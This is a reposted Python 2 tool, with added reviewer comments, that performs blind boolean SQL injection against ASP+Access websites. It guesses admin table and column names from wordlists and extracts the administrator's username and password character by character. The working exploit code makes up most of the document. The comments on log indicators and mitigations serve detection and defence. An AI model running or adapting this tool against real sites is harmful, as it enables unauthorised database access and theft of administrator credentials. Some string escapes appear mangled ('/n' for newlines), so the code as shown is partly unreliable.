[转载]Python实现ASP+ACCESS注入的工具源代码
#!/usr/bin/python
# ASP ACCESS SQL Injection Test
# Written by ToToDoDo (QQ:8924007) Email: osbbs@osbbs.com
#
# Reviewer notes (how the script works and what it looks like from the
# server side):
#
# * Python 2 only: it relies on print statements, raw_input, urllib.urlopen
#   and string.join/strip.
# * Every probe is a plain GET of the user-supplied URL with a URL-encoded
#   " and <condition>" suffix appended. A condition counts as true when the
#   response body matches `judge`; because `search` is re.search, `judge` is
#   interpreted as a regular expression, not a literal substring.
# * The "/n" sequences inside the string literals are literal slash-n here;
#   they look like "\n" escapes mangled when the page was republished (the
#   "C:/Python23>" prompt has the same shape). NOTE(review): confirm against
#   an original copy before relying on the output format.
# * Detection: the probes are visible in ordinary web-server access logs.
#   The query string carries "%20and%201=1" / "%20and%201=2", then
#   "%20and%20exists%20(select%20", then "where%20len(" and "Asc(mid(" with
#   one number changing per request. urlopen is called without custom
#   headers, so Python 2's urllib sends its default "Python-urllib/<version>"
#   User-Agent. Recovering one value tries up to 50 lengths and up to 255
#   code points per character, so the requests arrive as a long burst of
#   near-identical GETs from one client.
# * Mitigation: the technique only works when the page concatenates the
#   query-string value into SQL text. Binding it as a query parameter, or
#   coercing a numeric id to an integer before use, removes the true/false
#   oracle every function below depends on. Storing salted password hashes
#   rather than plaintext limits what the value read from the password
#   column is worth.

from sys import exit
from urllib import urlopen
from string import join,strip
from re import search

def get_tablename():
    """Probe table.txt candidates until one table name is accepted.

    Each candidate is tested with "and exists (select * from <name>)".
    On the first response matching `judge` the script moves on to the
    name-column and password-column probes for that table, then stops.
    Reads the module-level globals `url` and `judge`.
    """
    tablefile = open("table.txt")
    for line in tablefile.readlines():
        line = strip(line)
        sql = join(['%20and%20exists%20(select%20*%20from%20',line,')'],'')
        urlfile = urlopen(url+sql)
        htmlcodes = urlfile.read()
        # No match for `judge` means the server answered with its "false" page.
        if not search(judge,htmlcodes):
            print "Error:",line
        else:
            print "Found the admin table name:", line,"/n"
            print "Now! Start to get name column from",line,"table"
            get_namecolumn(line)
            print "Now! Start to get password column from",line,"table"
            get_passwordcolumn(line)
            break

def get_namecolumn(tablename):
    """Probe namecolumn.txt candidates for a column that exists in `tablename`.

    Uses "and exists (select <column> from <table>)"; on the first hit it
    hands over to get_usernamelenth and stops.
    """
    namecolumn = open("namecolumn.txt")
    for namecolumnline in namecolumn.readlines():
        namecolumnline = strip(namecolumnline)
        sql = join(['%20and%20exists%20(select%20',namecolumnline,'%20from%20',tablename,')'],'')
        urlfile = urlopen(url+sql)
        htmlcodes = urlfile.read()
        if not search(judge,htmlcodes):
            print "Error:",namecolumnline
        else:
            print "Found the name column from admin table:", namecolumnline,"/n"
            get_usernamelenth(tablename,namecolumnline)
            break

def get_passwordcolumn(tablename):
    """Probe passwordcolumn.txt candidates for a column that exists in `tablename`.

    Same request shape as get_namecolumn; on the first hit it hands over to
    get_passwordlenth and stops.
    """
    passwordcolumn = open("passwordcolumn.txt")
    for passwordcolumnline in passwordcolumn.readlines():
        passwordcolumnline = strip(passwordcolumnline)
        sql = join(['%20and%20exists%20(select%20',passwordcolumnline,'%20from%20',tablename,')'],'')
        urlfile = urlopen(url+sql)
        htmlcodes = urlfile.read()
        if not search(judge,htmlcodes):
            print "Error:",passwordcolumnline
        else:
            print "Found the password column from admin table:", passwordcolumnline,"/n"
            get_passwordlenth(tablename,passwordcolumnline)
            break

def get_usernamelenth(tablename,namecolumn):
    """Find the length (1..50) of a value in `namecolumn` by equality probes.

    Each request asks whether "select top 1 Count(*) ... where len(<column>)=x"
    equals 1. The first length that matches `judge` is passed to get_username.
    In logs this is a run of requests whose only difference is the number
    after "len(...)=".
    """
    for x in range(1,51):
        sql = join(['%20and%201=(select%20top%201%20Count(*)%20From%20',tablename,'%20where%20len(',namecolumn,')=',str(x),')'],'')
        urlfile = urlopen(url+sql)
        htmlcodes = urlfile.read()
        if not search(judge,htmlcodes):
            print "Error:",x
        else:
            print "Found the lenth of the username:", x,"/n"
            get_username(tablename,namecolumn,x)
            break

def get_passwordlenth(tablename,passwordcolumn):
    """Find the length (1..50) of a value in `passwordcolumn`.

    Same probe as get_usernamelenth; the first matching length is passed to
    get_password.
    """
    for x in range(1,51):
        sql = join(['%20and%201=(select%20top%201%20Count(*)%20From%20',tablename,'%20where%20len(',passwordcolumn,')=',str(x),')'],'')
        urlfile = urlopen(url+sql)
        htmlcodes = urlfile.read()
        if not search(judge,htmlcodes):
            print "Error:",x
        else:
            print "Found the lenth of the password:", x,"/n"
            get_password(tablename,passwordcolumn,x)
            break

def get_username(tablename,namecolumn,lenth):
    """Recover a `namecolumn` value one character at a time into global `username`.

    For each position 1..lenth the script compares Asc(mid(<column>, y, 1))
    against candidate code points, one request per candidate, and keeps the
    first candidate whose response matches `judge`. A position with no match
    contributes nothing, so the result can be shorter than `lenth`.
    """
    # Candidate code points in probing order: digits, lowercase, uppercase,
    # the remaining printable ASCII ranges, then 123..255 and 1..32.
    list = []
    for x in [range(48,58),range(97,123),range(65,91),range(33,48),range(58,65),range(91,97),range(123,256),range(1,33)]:
        list.extend(x)
    # Module-level global: the top-level code prints it after get_tablename().
    global username
    username = ''
    for y in range(1,lenth+1):
        print "Now! Crack the left ",y," of the username","Waiting~~~~~~~"
        for z in list:
            sql = join(["%20and%201=(select%20top%201%20count(*)%20from%20",tablename,"%20where%20Asc(mid(",namecolumn,",",str(y),",","1))=",str(z),")"],'')
            urlfile = urlopen(url+sql)
            htmlcodes = urlfile.read()
            if search(judge,htmlcodes):
                username = join([username,chr(z)],'')
                break
    print "Found the username = :",username,"/n"

def get_password(tablename,passwordcolumn,lenth):
    """Recover a `passwordcolumn` value one character at a time into global `password`.

    Identical in structure to get_username. Whatever the column stores is what
    comes back: plaintext if the application stores plaintext, otherwise the
    stored digest.
    """
    # Same candidate order as get_username.
    list = []
    for x in [range(48,58),range(97,123),range(65,91),range(33,48),range(58,65),range(91,97),range(123,256),range(1,33)]:
        list.extend(x)
    # Module-level global: the top-level code prints it after get_tablename().
    global password
    password = ''
    for y in range(1,lenth+1):
        print "Now! Crack the left ",y," of the password","Waiting~~~~~~~"
        for z in list:
            sql = join(["%20and%201=(select%20top%201%20count(*)%20from%20",tablename,"%20where%20Asc(mid(",passwordcolumn,",",str(y),",","1))=",str(z),")"],'')
            urlfile = urlopen(url+sql)
            htmlcodes = urlfile.read()
            if search(judge,htmlcodes):
                password = join([password,chr(z)],'')
                break
    print "Found the password = :",password,"/n"

# ---- Script entry: banner, interactive input, then the true/false check ----
print "/n########################################################################/n"
print " ASP+ACCESS SQL Injection Scripts By ToToDoDo with Python 2.3.x(QQ:8924007)"
print " Email: [email]osbbs@msn.com[/email]/n"
print "========================================================================";
# The usage text is kept on one line exactly as the page shows it; the
# original line breaks inside the triple-quoted string were lost in the scrape.
print """Usage: C:/Python23>python asp_inject.py Supply a URL to test inject = [url]http://127.0.0.1/article/list.asp?id=3[/url] Supply some string in correct page but not in error page to help this script to judge properly. Judge string = test/n"""
print "########################################################################/n";
# `url` and `judge` are module-level globals read by every function above.
url = raw_input('Supply a URL to test inject = ')
if url == '':
    print "U must supply a URL with '.asp?xxx=' in"
    exit(1)
judge = raw_input("/nSupply some string in correct page but not in error page to help this script to judge properly./n/nJudge string = ")
if judge == '':
    print "U must supply a string to help judge!"
    exit(1)
# Baseline pair: an always-true and an always-false condition appended to the
# same URL. The page is treated as injectable only when the `judge` pattern
# appears for the first and is absent for the second. Seeing both suffixes
# against one URL in quick succession is the earliest log indicator.
a = '%20and%201=1'
b = '%20and%201=2'
urlfile_a = urlopen(url+a)
urlfile_b = urlopen(url+b)
htmlcodes_a = urlfile_a.read()
htmlcodes_b = urlfile_b.read()
if search(judge,htmlcodes_a) and not search(judge,htmlcodes_b):
    print "/n/n/nFound injection:",url,"/n/n/nNow,start to get the table name!","/n"
    get_tablename()
    # `username` and `password` exist only if the column and length probes
    # above all succeeded; nothing assigns them otherwise.
    print "/n/n/nThe admin's account name is ",username,"/nThe admin's password is ",password
else:
    print "Can't be Injected"

# Three dictionary files are required (one candidate per line, as read by
# the readlines() loops above):
#   table.txt:          user userinfo admintable admin article_admin
#   namecolumn.txt:     name username u_name uname adminname
#   passwordcolumn.txt: pass adminpass pwd password passwd admin_pass admin_password
# These identifiers appear verbatim in the probe query strings, so they can
# also serve as match terms when reviewing access logs for this tool.